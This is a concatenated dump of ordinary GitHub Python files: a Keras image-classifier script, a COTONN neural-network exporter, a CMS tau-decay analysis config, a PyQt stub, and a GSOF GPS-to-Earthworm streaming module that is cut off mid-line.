target_size=(150,150), #사이즈조절가능\n batch_size=600,\n class_mode='categorical',\n shuffle=True,\n subset='training') # set as training data\n\nvalidation_generator = train_datagen.flow_from_directory(\n '../_data/image/horse-or-human',\n target_size=(150,150), #사이즈조절가능\n batch_size=600,\n class_mode='categorical',\n subset='validation') # set as validation data\n\n \n\nprint(train_generator[0][0].shape) #(600, 150, 150, 3)\nprint(validation_generator[0][0].shape) #(205, 150, 150, 3)\n\nnp.save('../_save_npy/keras48_2_1_train_x.npy', arr= train_generator[0][0])\nnp.save('../_save_npy/keras48_2_1_train_y.npy', arr= train_generator[0][1])\nnp.save('../_save_npy/keras48_2_1_test_x.npy', arr= validation_generator[0][0])\nnp.save('../_save_npy/keras48_2_1_test_y.npy', arr= validation_generator[0][1])\n\n# print(train_generator[0])\n# print(validation_generator[0])\n\n# xy_train = train_datagen.flow_from_directory( \n# '../_data/image/horse-or-human/training_set',\n# target_size = (50,50), \n# batch_size = 10,\n# class_mode = 'binary',\n# shuffle = True,\n# ) \n\n# xy_test = test_datagen.flow_from_directory(\n# '../_data/image/cat_dog/test_set',\n# target_size = (50,50),\n# batch_size = 10, \n# class_mode = 'binary',\n# )\n\n# print(xy_train[0][0].shape, xy_train[0][1].shape) # (10, 50, 50, 3) (10,)\n\n# np.save('./_save_npy/keras48_2_train_x.npy', arr = train_generator[0][0])\n# np.save('./_save_npy/keras48_2_train_y.npy', arr = train_generator[0][1])\n# np.save('./_save_npy/keras48_2_test_x.npy', arr = validation_generator[0][0])\n# np.save('./_save_npy/keras48_2_test_y.npy', arr = validation_generator[0][1])\n\n\n# 2. 모델\nfrom tensorflow.keras.models import Sequential\nfrom keras.layers import *\n\nmodel = Sequential()\nmodel.add(Conv2D(16, kernel_size=(3,3), padding='same', input_shape=(150,150,3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.2))\n\nmodel.add(Conv2D(64, kernel_size=(3,3),padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.3))\n\nmodel.add(Conv2D(128, kernel_size=(3,3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.5))\n\nmodel.add(Flatten())\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(2, activation='softmax'))\n\n# 3. 컴파일, 훈련\nmodel.compile(loss='categorical_crossentropy', optimizer= 'adam', metrics=['acc'])\n\nhist = model.fit_generator(train_generator, epochs = 20, steps_per_epoch = 1, \n validation_data = validation_generator,\n validation_steps = 4,)\n\nacc = hist.history['acc']\nval_acc = hist.history['val_acc']\nloss = hist.history['loss']\nval_loss = hist.history['val_loss']\n\nprint('loss:', loss[-1])\nprint('val_loss:', val_loss[-1])\nprint('acc:', acc[-1])\nprint('val_acc:',val_acc [-1])\n\n\n# model.fit_generator(\n# train_generator,\n# steps_per_epoch = train_generator.samples // batch_size,\n# validation_data = validation_generator, \n# validation_steps = validation_generator.samples // batch_size,\n# epochs = nb_epochs)\n\n'''\nloss: 0.678576648235321\nval_loss: 0.9945012331008911\nacc: 0.5733333230018616\nval_acc: 0.5121951103210449\n'''","repo_name":"jangsejong/STUDY","sub_path":"keras/keras47_48Npy_IDG/keras48_2_horse_or_human_IDG.py","file_name":"keras48_2_horse_or_human_IDG.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74009209444","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\nimport csv\r\n\r\n\r\n# Exporter class responsible for exporting to files\r\nclass Exporter:\r\n def __init__(self, version):\r\n self.save_location = \"./saves/\"\r\n self.version = version\r\n \r\n \r\n def setSaveLocation(self, value): self.save_location = value\r\n \r\n\r\n def saveUpdatedAvoid(self, filename, wrong_states, loosing_states):\r\n file = open(filename[:-10]+\"UpdateAvoid.hh\", \"w\")\r\n file.write(\"#include \\n#include \\n//size:\"+str(len(wrong_states))+\"\\nstd::vector H{\\n\")\r\n \r\n for i in range(len(wrong_states)):\r\n file.write(str(wrong_states[i][0]) + \", \\n\")\r\n \r\n file.write(\"};\") \r\n file.close()\r\n \r\n print(\"Updated avoid states saved to path:\"+filename[:-10]+\"UpdateAvoid.hh\") \r\n\r\n file = open(\"./simulation/matlab/loosing_\"+filename[12:-11]+\".m\", \"w\")\r\n\r\n for i in range(len(loosing_states[0])):\r\n file.write(\"x{\"+str(i+1)+\"} = [\") \r\n for j in range(len(loosing_states)):\r\n file.write(str(loosing_states[j][i]) + \", \")\r\n file.write(\"]; \\n\") \r\n\r\n wrong_x = [row[1] for row in wrong_states]\r\n \r\n if len(wrong_x) == 0:\r\n wrong_x.append([])\r\n\r\n for i in range(len(wrong_x[0])):\r\n file.write(\"x{\"+str(i+1+len(wrong_x[0]))+\"} = [\") \r\n for j in range(len(wrong_x)):\r\n file.write(str(wrong_x[j][i]) + \", \")\r\n file.write(\"]; \\n\") \r\n \r\n file.close() \r\n print(\"Matlab file for unsafe states saved to : ./simulation/matlab/loosing_\"+filename[12:-11]+\".m\")\r\n\r\n file = open(self.save_location + \"loosing_\"+filename[12:-11]+\".m\", \"w\")\r\n \r\n for i in range(len(loosing_states[0])):\r\n file.write(\"x{\"+str(i+1)+\"} = [\") \r\n for j in range(len(loosing_states)):\r\n file.write(str(loosing_states[j][i]) + \", \")\r\n file.write(\"]; \\n\") \r\n\r\n wrong_x = [row[1] for row in wrong_states]\r\n \r\n if len(wrong_x) == 0:\r\n wrong_x.append([])\r\n\r\n for i in range(len(wrong_x[0])):\r\n file.write(\"x{\"+str(i+1+len(wrong_x[0]))+\"} = [\") \r\n for j in range(len(wrong_x)):\r\n file.write(str(wrong_x[j][i]) + \", \")\r\n file.write(\"]; \\n\") \r\n \r\n file.close() \r\n print(\"Matlab file for unsafe states saved to : \" + self.save_location + \"loosing_\"+filename[12:-11]+\".m\")\r\n\r\n def saveTrainingData(self, nnm):\r\n \r\n iterations_array = np.array(nnm.iterations)[:, None]\r\n fitnesses_array = np.array(nnm.fitnesses)[:, None]\r\n losses_array = np.array(nnm.losses)[:, None]\r\n\r\n training_history = np.concatenate((iterations_array, losses_array, fitnesses_array), axis = 1)\r\n\r\n file = open(self.save_location + \"training_data.csv\", \"w\")\r\n #file.write(\"COTONN v\" + self.version + \" Training data (#\" + str(len(iterations_array)) + \"): \\n\")\r\n np.savetxt(self.save_location + \"training_data.csv\", training_history, delimiter=\",\", header=\"Iteration,Loss,Fitness\", comments='')\r\n file.close()\r\n \r\n print(\"Training data saved to path: \" + self.save_location + \"training_data.csv\")\r\n\r\n \r\n # Save network graph\r\n def saveNetwork(self, nnm):\r\n # Create a saver\r\n self.network_saver = tf.train.Saver()\r\n session = nnm.nn.session\r\n \r\n # Save the given session \r\n self.network_saver.save(session, self.save_location + \"model\") \r\n print(\"\\nModel saved to path: \" + self.save_location + \"model\")\r\n \r\n \r\n # Save network variables\r\n def saveVariables(self, nnm, list_variables): \r\n # Create a saver\r\n self.saver = tf.train.Saver(list_variables)\r\n session = nnm.nn.session\r\n \r\n # Save the given session \r\n self.saver.save(session, self.save_location + \"variable\")\r\n print(\"Variables saved to path: \" + self.save_location + \"variable\")\r\n \r\n \r\n # Save variables as text\r\n def saveRawMLP(self, nnm):\r\n file = open(self.save_location + \"nn.txt\", \"w\")\r\n file.write(\"COTONN v\" + self.version + \" raw NN:\\n\")\r\n \r\n session = nnm.nn.session\r\n layers = nnm.nn.layers\r\n \r\n for i in range (len(layers) - 1):\r\n with tf.variable_scope(\"layer_\" + str(i), reuse=True):\r\n weight = tf.get_variable(\"kernel\")\r\n bias = tf.get_variable(\"bias\")\r\n \r\n weight_eval = session.run(weight)\r\n bias_eval = session.run(bias)\r\n \r\n file.write(\"\\nW\" + str(i) + \"\\n\")\r\n \r\n np.savetxt(file, weight_eval)\r\n file.write(\"\\nb\" + str(i) + \"\\n\")\r\n np.savetxt(file, bias_eval)\r\n \r\n file.close()\r\n print(\"Raw MLP saved to path: \" + self.save_location + \"nn.txt\")\r\n \r\n \r\n # Save neural network in a very simple format that is executable as a MATLAB script\r\n def saveMatlabMLP(self, controller, nnm):\r\n file = open(self.save_location + \"nn.m\", \"w\")\r\n \r\n session = nnm.nn.session\r\n layers = nnm.nn.layers\r\n \r\n file.write(\"s_eta = [\")\r\n for x in controller.getStateSpaceEtas(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"s_ll = [\")\r\n for x in controller.getStateSpaceLowerLeft(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"s_ur = [\")\r\n for x in controller.getStateSpaceUpperRight(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"\\nu_eta = [\")\r\n for x in controller.getInputSpaceEtas(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"u_ll = [\")\r\n for x in controller.getInputSpaceLowerLeft(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"u_ur = [\")\r\n for x in controller.getInputSpaceUpperRight(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n\r\n \r\n for i in range (len(layers) - 1):\r\n with tf.variable_scope(\"layer_\" + str(i), reuse=True):\r\n weight = tf.get_variable(\"kernel\")\r\n bias = tf.get_variable(\"bias\")\r\n \r\n weight_eval = session.run(weight)\r\n bias_eval = session.run(bias)\r\n \r\n file.write(\"\\nW{\"+ str(i+1) + \"} = [\")\r\n np.savetxt(file, weight_eval)\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"\\nb{\" + str(i+1) + \"} = [\")\r\n np.savetxt(file, bias_eval)\r\n file.write(\"];\\n\")\r\n \r\n file.close()\r\n print(\"Matlab MLP saved to path: \" + self.save_location + \"nn.m\")\r\n\r\n file = open(\"simulation/matlab/nn/nn.m\", \"w\")\r\n \r\n session = nnm.nn.session\r\n layers = nnm.nn.layers\r\n \r\n file.write(\"s_eta = [\")\r\n for x in controller.getStateSpaceEtas(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"s_ll = [\")\r\n for x in controller.getStateSpaceLowerLeft(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"s_ur = [\")\r\n for x in controller.getStateSpaceUpperRight(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"\\nu_eta = [\")\r\n for x in controller.getInputSpaceEtas(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"u_ll = [\")\r\n for x in controller.getInputSpaceLowerLeft(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"u_ur = [\")\r\n for x in controller.getInputSpaceUpperRight(): file.write(x + \" \")\r\n file.write(\"];\\n\")\r\n\r\n \r\n for i in range (len(layers) - 1):\r\n with tf.variable_scope(\"layer_\" + str(i), reuse=True):\r\n weight = tf.get_variable(\"kernel\")\r\n bias = tf.get_variable(\"bias\")\r\n \r\n weight_eval = session.run(weight)\r\n bias_eval = session.run(bias)\r\n \r\n file.write(\"\\nW{\"+ str(i+1) + \"} = [\")\r\n np.savetxt(file, weight_eval)\r\n file.write(\"];\\n\")\r\n \r\n file.write(\"\\nb{\" + str(i+1) + \"} = [\")\r\n np.savetxt(file, bias_eval)\r\n file.write(\"];\\n\")\r\n \r\n file.close()\r\n print(\"Matlab MLP saved to path: simulation/matlab/nn/nn.m\")\r\n \r\n \r\n # Save as a binary dump (smallest representation)\r\n def saveBinary(self, nnm):\r\n file = open(self.save_location + \"nn.cot\",\"wb\")\r\n \r\n session = nnm.nn.session\r\n layers = nnm.nn.layers\r\n \r\n for i in range (len(layers) - 1):\r\n with tf.variable_scope(\"layer_\" + str(i), reuse=True):\r\n weight = tf.get_variable(\"kernel\")\r\n bias = tf.get_variable(\"bias\")\r\n \r\n weight_eval = session.run(weight)\r\n bias_eval = session.run(bias)\r\n \r\n weight_shape = session.run(tf.shape(weight))\r\n bias_shape = session.run(tf.shape(bias))\r\n \r\n file.write(int(weight_shape[0]).to_bytes(4, \"little\"))\r\n file.write(int(weight_shape[1]).to_bytes(4, \"little\"))\r\n file.write(weight_eval.tostring())\r\n \r\n file.write(int(bias_shape[0]).to_bytes(4, \"little\"))\r\n file.write(bias_eval.tostring())\r\n \r\n # print(weight_shape)\r\n # print(bias_shape)\r\n\r\n print(\"Binary saved to path: \" + self.save_location + \"nn.cot\")\r\n file.close() \r\n \r\n \r\n # Save wrong states as a text file\r\n def saveWrongStates(self, wrong_states):\r\n file = open(self.save_location + \"wrong_states.txt\", \"w\")\r\n file.write(\"COTONN v\" + self.version + \" Wrong states (#\" + str(len(wrong_states)) + \"): \\n\")\r\n \r\n # if(len(wrong_states)== 0): return \r\n \r\n for i in range(len(wrong_states)):\r\n file.write(str(wrong_states[i]).replace('[', '{').replace(']','},') + \"\\n\")\r\n \r\n file.close()\r\n \r\n print(\"Wrong states saved to path: \" + self.save_location + \"wrong_states.txt\")\r\n","repo_name":"anggairawan/COTONNv2.0","sub_path":"src/Exporter.py","file_name":"Exporter.py","file_ext":"py","file_size_in_byte":10637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42236479547","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"ANALYSIS\")\n\n#PDG IDs\nA_PDGID = 36\nZ_PDGID = 23\nTAU_PDGID = 15\nMU_PDGID = 13\n\n#tau decay types\nTAU_HAD = 0\nTAU_MU = 1\nTAU_E = 2\nTAU_ALL = 3\n\n#tau hadronic decay types\nTAU_ALL_HAD = -1\nTAU_1PRONG_0NEUTRAL = 0\nTAU_1PRONG_1NEUTRAL = 1\nTAU_1PRONG_2NEUTRAL = 2\nTAU_1PRONG_3NEUTRAL = 3\nTAU_1PRONG_NNEUTRAL = 4\nTAU_2PRONG_0NEUTRAL = 5\nTAU_2PRONG_1NEUTRAL = 6\nTAU_2PRONG_2NEUTRAL = 7\nTAU_2PRONG_3NEUTRAL = 8\nTAU_2PRONG_NNEUTRAL = 9\nTAU_3PRONG_0NEUTRAL = 10\nTAU_3PRONG_1NEUTRAL = 11\nTAU_3PRONG_2NEUTRAL = 12\nTAU_3PRONG_3NEUTRAL = 13\nTAU_3PRONG_NNEUTRAL = 14\nTAU_RARE = 15\n\n#no consideration of pT rank\nANY_PT_RANK = -1\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(100)\n\nprocess.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\n \"PoolSource\",\n fileNames = cms.untracked.vstring(\n 'file:/data1/yohay/NMSSMHiggs_gg_files1-500.root',\n 'file:/data1/yohay/NMSSMHiggs_gg_files501-1000.root'\n ),\n skipEvents = cms.untracked.uint32(0)\n )\n\n#for L1GtStableParametersRcd\nprocess.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')\nprocess.GlobalTag.globaltag = cms.string('START52_V9::All')\n\n#for HLT selection\nprocess.load('HLTrigger/HLTfilters/hltHighLevel_cfi')\n\n#define a parameter set to be passed to all modules that utilize GenTauDecayID\ncommonGenTauDecayIDPSet = cms.PSet(momPDGID = cms.int32(A_PDGID),\n chargedHadronPTMin = cms.double(0.0),\n neutralHadronPTMin = cms.double(0.0),\n chargedLeptonPTMin = cms.double(0.0),\n totalPTMin = cms.double(0.0))\n\n#produce gen tau collections\nprocess.genTauSelector = cms.EDFilter(\n 'GenObjectProducer',\n genParticleTag = cms.InputTag('genParticles'),\n absMatchPDGID = cms.uint32(TAU_PDGID),\n genTauDecayIDPSet = commonGenTauDecayIDPSet,\n primaryTauDecayType = cms.uint32(TAU_ALL),\n sisterTauDecayType = cms.uint32(TAU_ALL),\n primaryTauPTRank = cms.int32(0),\n primaryTauHadronicDecayType = cms.int32(TAU_ALL_HAD),\n sisterHadronicDecayType = cms.int32(TAU_ALL_HAD),\n primaryTauAbsEtaMax = cms.double(-1.0),\n countSister = cms.bool(True),\n applyPTCuts = cms.bool(False),\n countKShort = cms.bool(True),\n minNumGenObjectsToPassFilter = cms.uint32(0),\n makeAllCollections = cms.bool(True)\n )\n\n#analyze\nprocess.genTauAnalyzer = cms.EDAnalyzer(\n 'DecayModePTRankAnalyzer',\n outFileName = cms.string('/data1/yohay/NMSSMHiggs_gg_decayModePTRank_analysis.root'),\n tauMuInputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayModeMuPTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayModeMuPTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayModeMuPTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayModeMuPTRank3', 'ANALYSIS')),\n tau1ProngInputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayMode1ProngPTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1ProngPTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1ProngPTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1ProngPTRank3', 'ANALYSIS')),\n tau1Prong1Pi0InputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayMode1Prong1Pi0PTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong1Pi0PTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong1Pi0PTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong1Pi0PTRank3', 'ANALYSIS')),\n tau1Prong2Pi0InputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayMode1Prong2Pi0PTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong2Pi0PTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong2Pi0PTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode1Prong2Pi0PTRank3', 'ANALYSIS')),\n tau3ProngInputTags = cms.VInputTag(\n cms.InputTag('genTauSelector', 'decayMode3ProngPTRank0', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode3ProngPTRank1', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode3ProngPTRank2', 'ANALYSIS'),\n cms.InputTag('genTauSelector', 'decayMode3ProngPTRank3', 'ANALYSIS')),\n genParticleTag = cms.InputTag('genParticles'),\n genTauDecayIDPSet = commonGenTauDecayIDPSet,\n applyPTCuts = cms.bool(False),\n countKShort = cms.bool(True),\n pTRankColors = cms.vuint32(1, 2, 4, 6),\n pTRankStyles = cms.vuint32(20, 21, 22, 23),\n pTRankEntries = cms.vstring('Highest p_{T}', 'Second highest p_{T}', 'Third highest p_{T}',\n 'Lowest p_{T}'),\n decayModeColors = cms.vuint32(1, 2, 4, 6, 8),\n decayModeStyles = cms.vuint32(20, 21, 22, 23, 24),\n decayModeEntries = cms.vstring('#tau_{#mu}', '#tau_{had}, 1 prong',\n '#tau_{had}, 1 prong + 1 #pi^{0}',\n '#tau_{had}, 1 prong + 2 #pi^{0}', '#tau_{had}, 3 prong')\n )\n\n#path\nprocess.p = cms.Path(process.genTauSelector*process.genTauAnalyzer)\n","repo_name":"rpyohay/boosted-tau-analysis","sub_path":"BoostedTauAnalysis/GenMatchedRecoObjectProducer/test/analyzeDecayModesAndPT.py","file_name":"analyzeDecayModesAndPT.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30230511720","text":"from PyQt5 import uic, QtWidgets\nimport sys\n\nclass CloseWin():\n def __init__(self):\n super(CloseWin, self).__init__()\n self.ui = uic.loadUi(\"closewindows.ui\")\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n closewin = CloseWin()\n closewin.ui.show()\n app.exec_()","repo_name":"changesmile/PYQT_Demo","sub_path":"CloseWindows.py","file_name":"CloseWindows.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36513429138","text":"from struct import unpack\nimport functools\nimport PyEW\nimport socket\nimport math\nimport argparse\nimport json\nimport http.client\nimport urllib\nimport sys\nimport numpy as np\nfrom threading import Thread\nfrom math import radians, sqrt, sin, cos\n\n# Mods by Alberto M. Lopez and Francisco Hernandez to deal with gps time to unix time\n# taken from code time2time.py from https://raw.githubusercontent.com/igors/time2time/master/time2time.py\nimport optparse\nimport time\nimport datetime\n\nsecsInWeek = 604800\nsecsInDay = 86400\nUNIX2GPS = 315964800 # seconds from UNIX to GPS epoch\nGPS_LEAP_SECONDS = 18 # leap seconds since GPS epoch (as of 4/18/2017)\n# A note about the number above: A constant offset between unix time and gps time exist=19, \n# but up to the date above there are 37 leap seconds, therefore, the difference is the number assigned above\n# to the variable GPS_LEAP_SECONDS.\nUSE_UTC = False\n\n\n# Declare the station to be processed: PRSN - Puerto Rico Seismic Network and its ECEF XYZ position\nSTA_X=2353900.1799\nSTA_Y=-5584618.6433\nSTA_Z=1981221.1234\n#\n\n## GSOF CLASS (Can just be imported I think)\n__author__ = \"Henry T. Berglund\"\nclass Gsof(object):\n \"\"\" Class to connect to tcp port and parse GSOF messages \"\"\"\n\n def __init__(self, sock=None):\n if sock is None:\n self.sock = socket.socket(\n socket.AF_INET, socket.SOCK_STREAM)\n else:\n self.sock = sock\n self.msg_dict = {}\n self.msg_bytes = None\n self.checksum = None\n self.rec_dict = {}\n\n def connect(self, host, port):\n self.sock.connect((host, port))\n\n def get_message_header(self):\n data = self.sock.recv(7)\n msg_field_names = ('STX', 'STATUS', 'TYPE', 'LENGTH',\n 'T_NUM', 'PAGE_INDEX', 'MAX_PAGE_INDEX')\n self.msg_dict = dict(zip(msg_field_names, unpack('>7B', data)))\n self.msg_bytes = self.sock.recv(self.msg_dict['LENGTH'] - 3)\n (checksum, etx) = unpack('>2B', self.sock.recv(2))\n\n def checksum256(st):\n \"\"\"Calculate checksum\"\"\"\n return functools.reduce(lambda x, y: x+y, st) % 256\n if checksum-checksum256(self.msg_bytes+data[1:]) == 0:\n self.checksum = True\n else:\n self.checksum = False\n\n def get_records(self):\n while len(self.msg_bytes) > 0:\n # READ THE FIRST TWO BYTES FROM RECORD HEADER\n record_type, record_length = unpack('>2B', self.msg_bytes[0:2])\n self.msg_bytes = self.msg_bytes[2:]\n self.select_record(record_type, record_length)\n\n def select_record(self, record_type, record_length):\n if record_type == 1:\n rec_field_names = ('GPS_TIME', 'GPS_WEEK', 'SVN_NUM',\n 'FLAG_1', 'FLAG_2', 'INIT_NUM')\n rec_values = unpack('>LH4B', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 2:\n rec_field_names = ('LATITUDE', 'LONGITUDE', 'HEIGHT')\n rec_values = unpack('>3d', self.msg_bytes[0:record_length])\n rec_values = list(rec_values)\n rec_values = (math.degrees(rec_values[0]), math.degrees(rec_values[1]), rec_values[2])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 3:\n rec_field_names = ('X_POS', 'Y_POS', 'Z_POS')\n rec_values = unpack('>3d', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 4:\n rec_field_names = ('LOCAL_DATUM_ID', 'LOCAL_DATUM_LAT',\n 'LOCAL_DATUM_LON', 'LOCAL_DATUM_HEIGHT', 'OPRT')\n rec_values = unpack('>8s3dB', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 5:\n rec_field_names = ('LOCAL_DATUM_ID', 'LOCAL_ZONE_ID',\n 'LOCAL_ZONE_NORTH', 'LOCAL_ZONE_EAST', 'LOCAL_DATUM_HEIGHT')\n rec_values = unpack('>2s3d', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 6:\n rec_field_names = ('DELTA_X', 'DELTA_Y', 'DELTA_Z')\n rec_values = unpack('>3d', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 7:\n rec_field_names = ('DELTA_EAST', 'DELTA_NORTH', 'DELTA_UP')\n rec_values = unpack('>3d', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 8:\n rec_field_names = ('VEL_FLAG', 'VELOCITY', 'HEADING', 'VERT_VELOCITY')\n rec_values = unpack('>B3f', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 9:\n rec_field_names = ('PDOP', 'HDOP', 'VDOP', 'TDOP')\n rec_values = unpack('>4f', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 10:\n rec_field_names = ('CLOCK_FLAG', 'CLOCK_OFFSET', 'FREQ_OFFSET')\n rec_values = unpack('>B2d', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 11:\n rec_field_names = ('POSITION_RMS_VCV', 'VCV_XX', 'VCV_XY', 'VCV_XZ',\n 'VCV_YY', 'VCV_YZ', 'VCV_ZZ', 'UNIT_VAR_VCV', 'NUM_EPOCHS_VCV')\n rec_values = unpack('>8fh', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 12:\n rec_field_names = ('POSITION_RMS_SIG', 'SIG_EAST', 'SIG_NORT', 'COVAR_EN', 'SIG_UP',\n 'SEMI_MAJOR', 'SEMI_MINOR', 'ORIENTATION', 'UNIT_VAR_SIG',\n 'NUM_EPOCHS_SIG')\n rec_values = unpack('>9fh', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 15:\n rec_field_names = 'SERIAL_NUM'\n rec_values = unpack('>l', self.msg_bytes[0:record_length])\n self.rec_dict.update({rec_field_names: rec_values[0]})\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 16:\n rec_field_names = ('GPS_MS_OF_WEEK', 'CT_GPS_WEEK', 'UTC_OFFSET', 'CT_FLAGS')\n rec_values = unpack('>l2hB', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 26:\n rec_field_names = ('UTC_MS_OF_WEEK', 'UTC_GPS_WEEK', 'UTC_SVS_NUM', 'UTC_FLAG_1', 'UTC_FLAG_2',\n 'UTC_INIT_NUM')\n rec_values = unpack('>lh4B', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n elif record_type == 34:\n NUM_OF_SVS = unpack('>B', self.msg_bytes[0])\n self.msg_bytes = self.msg_bytes[1:]\n rec_field_names = ('PRN', 'SV_SYSTEM', 'SV_FLAG1', 'SV_FLAG2', 'ELEVATION', 'AZIMUTH',\n 'SNR_L1', 'SNR_L2', 'SNR_L5')\n for field in xrange(len(rec_field_names)):\n self.rec_dict[rec_field_names[field]] = []\n for sat in xrange(NUM_OF_SVS[0]):\n rec_values = unpack('>5Bh3B', self.msg_bytes[0:10])\n self.msg_bytes = self.msg_bytes[10:]\n for num in xrange(len(rec_field_names)):\n self.rec_dict[rec_field_names[num]].append(rec_values[num])\n elif record_type == 37:\n rec_field_names = ('BATT_CAPACITY', 'REMAINING_MEM')\n rec_values = unpack('>hd', self.msg_bytes[0:record_length])\n self.rec_dict.update(dict(zip(rec_field_names, rec_values)))\n self.msg_bytes = self.msg_bytes[record_length:]\n else:\n \"\"\"Unknown record type? Skip it for now!\"\"\"\n #print record_type\n self.msg_bytes = self.msg_bytes[record_length:]\n## END GSOF CLASS\n\nclass Gsof2Ring():\n\n def __init__(self, Station = 'PRSN', Network = 'PR', IP = \"localhost\", PORT = 28001):\n # Create a thread for the Module\n self.myThread = Thread(target=self.run)\n\n # Start an EW Module with parent ring 1000, mod_id 8, inst_id 141, heartbeat 30s, debug = False (MODIFY THIS!)\n self.gsof2ring = PyEW.EWModule(1000, 8, 141, 30.0, False) \n\n # Add our Input ring as Ring 0\n self.gsof2ring.add_ring(1000)\n\n # Allow it to start\n self.runs = True\n \n # OPEN GSOF STREAM\n self.GPSRecv = Gsof()\n \n # Init Variable\n self.Station = Station\n self.Network = Network\n \n # Connect to GSOF\n self.GPSRecv.connect(IP, PORT)\n \n # Remember dtype must be int32\n self.dt = np.dtype(np.int32)\n \n def getGps(self): \n # READ GSOF STREAM\n self.GPSRecv.get_message_header()\n self.GPSRecv.get_records()\n\n # PRINT GSOF STREAM; Open pos file\n #outfile = open 